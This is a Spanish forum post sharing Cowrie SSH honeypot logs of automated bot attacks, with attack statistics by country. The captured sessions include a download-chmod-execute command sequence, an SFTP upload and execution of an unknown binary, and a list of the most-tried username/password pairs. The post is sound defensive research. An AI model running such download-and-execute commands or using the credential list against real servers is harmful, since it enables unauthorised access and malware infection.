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Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware

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Autor Tema: Logs interesantes Honeypot SSH (Cowrie)  (Leído 3,411 veces)
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Logs interesantes Honeypot SSH (Cowrie)
« en: 17 Febrero 2021, 16:07 pm »

Jugando con los honeypots he visto algunas cosas interesantes, aunque todo son herramientas automatizadas y no ataques de personales "reales", son todo bots.

Pero en log que pongo pues una ip China:
IP China

Se bajó un binario llamado 80

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget; curl -O; chmod +x 80; ./80

binario 80 ELF

gcc.pid ????

Top 10 comandos más utilizados:

En otra máquina resulados bastante diferentes:

Adjunto el log

2021-01-28T18:37:58.692411Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: ( [session: 1f08d81dd680]
2021-01-28T18:37:58.697484Z [HoneyPotSSHTransport,4,] Remote SSH version: b'SSH-2.0-PUTTY'
2021-01-28T18:37:58.957221Z [HoneyPotSSHTransport,4,] SSH client hassh fingerprint: 92674389fa1e47a27ddd8d9b63ecd42b
2021-01-28T18:37:58.962131Z [HoneyPotSSHTransport,4,] kex alg, key alg: b'diffie-hellman-group14-sha1' b'ssh-rsa'
2021-01-28T18:37:58.962417Z [HoneyPotSSHTransport,4,] outgoing: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:58.962656Z [HoneyPotSSHTransport,4,] incoming: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:59.568103Z [HoneyPotSSHTransport,4,] NEW KEYS
2021-01-28T18:37:59.818998Z [HoneyPotSSHTransport,4,] starting service b'ssh-userauth'
2021-01-28T18:38:00.081545Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,] b'root' trying auth b'none'
2021-01-28T18:38:00.340869Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,] b'root' trying auth b'password'
2021-01-28T18:38:00.342139Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,] Could not read etc/userdb.txt, default database activated
2021-01-28T18:38:00.342961Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,] login attempt [b'root'/b'mucleus.caca.root'] succeeded
2021-01-28T18:38:00.346823Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,] Initialized emulated server as architecture: linux-x64-lsb
2021-01-28T18:38:00.348560Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,] b'root' authenticated with b'password'
2021-01-28T18:38:00.349507Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,] starting service b'ssh-connection'
2021-01-28T18:38:00.603490Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] got channel b'session' request
2021-01-28T18:38:00.604767Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] channel open
2021-01-28T18:38:00.950026Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] executing command "b'#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget\ncurl -O\nchmod +x 80\n./80\n'"
2021-01-28T18:38:00.952721Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] CMD: #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget; curl -O; chmod +x 80; ./80;
2021-01-28T18:39:01.013363Z [-] exitCode: 1
2021-01-28T18:39:01.013920Z [-] sending request b'exit-status'
2021-01-28T18:39:01.015173Z [-] Closing TTY Log: var/lib/cowrie/tty/419a5f3fde27adba89708285693140846f5cf0e98a43290aa5003d8b4a4252d5 after 60 seconds
2021-01-28T18:39:01.015774Z [-] sending close 0
2021-01-28T18:39:01.519587Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] remote close
2021-01-28T18:39:01.520955Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] got channel b'session' request
2021-01-28T18:39:01.521879Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] channel open
2021-01-28T18:39:01.774363Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] asking for subsystem "b'sftp'"
2021-01-28T18:39:01.775031Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] {b'sftp': <class 'twisted.conch.ssh.filetransfer.FileTransferServer'>}
2021-01-28T18:39:02.500813Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] SFTP openFile: b'/bin/eyshcjdmzg'
2021-01-28T18:39:06.584852Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] adding 66161 to 64911 in channel 1
2021-01-28T18:39:10.653511Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] adding 66112 to 64960 in channel 1
2021-01-28T18:39:14.733271Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] adding 66112 to 64960 in channel 1
2021-01-28T18:39:18.811865Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] adding 66112 to 64960 in channel 1
2021-01-28T18:39:22.897300Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] adding 66112 to 64960 in channel 1
2021-01-28T18:39:26.974574Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] adding 66112 to 64960 in channel 1
2021-01-28T18:39:31.093693Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] adding 66112 to 64960 in channel 1
2021-01-28T18:39:35.187235Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] adding 66112 to 64960 in channel 1
2021-01-28T18:39:39.297588Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] adding 66112 to 64960 in channel 1
2021-01-28T18:39:43.879794Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] SFTP Uploaded file "eyshcjdmzg" to var/lib/cowrie/downloads/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631
2021-01-28T18:39:44.136949Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] sending close 1
2021-01-28T18:39:44.138294Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] remote close
2021-01-28T18:39:44.139275Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] got channel b'session' request
2021-01-28T18:39:44.140193Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] channel open
2021-01-28T18:39:44.480978Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] executing command "b'/bin/eyshcjdmzg'"
2021-01-28T18:39:44.483424Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] CMD: /bin/eyshcjdmzg
2021-01-28T18:39:44.485118Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] Command not found: /bin/eyshcjdmzg
2021-01-28T18:39:54.752142Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] exitCode: 0
2021-01-28T18:39:54.752851Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] sending request b'exit-status'
2021-01-28T18:39:54.754609Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] Closing TTY Log: var/lib/cowrie/tty/27bfa685b0774a88946b7b3f3d0f6291bcc8e0ae37769309a8d086593862c0d0 after 10 seconds
2021-01-28T18:39:54.759462Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] sending close 2
2021-01-28T18:39:55.004309Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] remote close
2021-01-28T18:39:55.296545Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] got channel b'session' request
2021-01-28T18:39:55.297591Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] channel open
2021-01-28T18:39:56.293421Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] executing command "b'ls -la /var/run/gcc.pid'"
2021-01-28T18:39:56.295896Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] CMD: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.297632Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] Command found: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.298644Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] exitCode: 0
2021-01-28T18:39:56.298941Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] sending request b'exit-status'
2021-01-28T18:39:56.299253Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] sending close 3
2021-01-28T18:39:57.974393Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] exitCode: 0
2021-01-28T18:39:57.975498Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] Closing TTY Log: var/lib/cowrie/tty/e9ca076a73c58dc3b053e9f3e0249b13f1c1b47d23846405096e8c10dc3f7d26 after 1 seconds
2021-01-28T18:39:57.978774Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,] remote close
2021-01-28T18:39:57.979388Z [HoneyPotSSHTransport,4,] Got remote error, code 11 reason: b''
2021-01-28T18:39:57.980313Z [HoneyPotSSHTransport,4,] avatar root logging out
2021-01-28T18:39:57.980654Z [HoneyPotSSHTransport,4,] connection lost
2021-01-28T18:39:57.980912Z [HoneyPotSSHTransport,4,] Connection lost after 119 seconds

En Twitter y en el blog he publicado algunas de las combinaciones de contraseñas más habituales

Top 20 COWRIE Usernames for 2021-02-11
   3288 b'root'|b'password'
    751 b'admin'|b'password'
    727 b'root'|b'none'
    426 b'admin'|b'none'
    252 b'Admin'|b'password'
    140 b'user'|b'password'
    124 b'Admin'|b'none'
    118 b'ubuntu'|b'password'
     96 b'nproc'|b'password'
     91 b'test'|b'password'
     80 b'postgres'|b'password'
     46 b'nagios'|b'password'
     42 b'oracle'|b'password'
     39 b'guest'|b'password'
     38 b'support'|b'password'
     38 b'Administrator'|b'password'
     30 b'git'|b'password'
     28 b'deploy'|b'password'
     24 b'ftpuser'|b'password'
     22 b'user'|b'none'

En otra ip resultados no exactamente iguales:

Y algunos gráficos completos (país, etc)

1- Irlanda
2- Rusia
3- Panamá

688 ip's diferentes en apenas 9 horas
En línea

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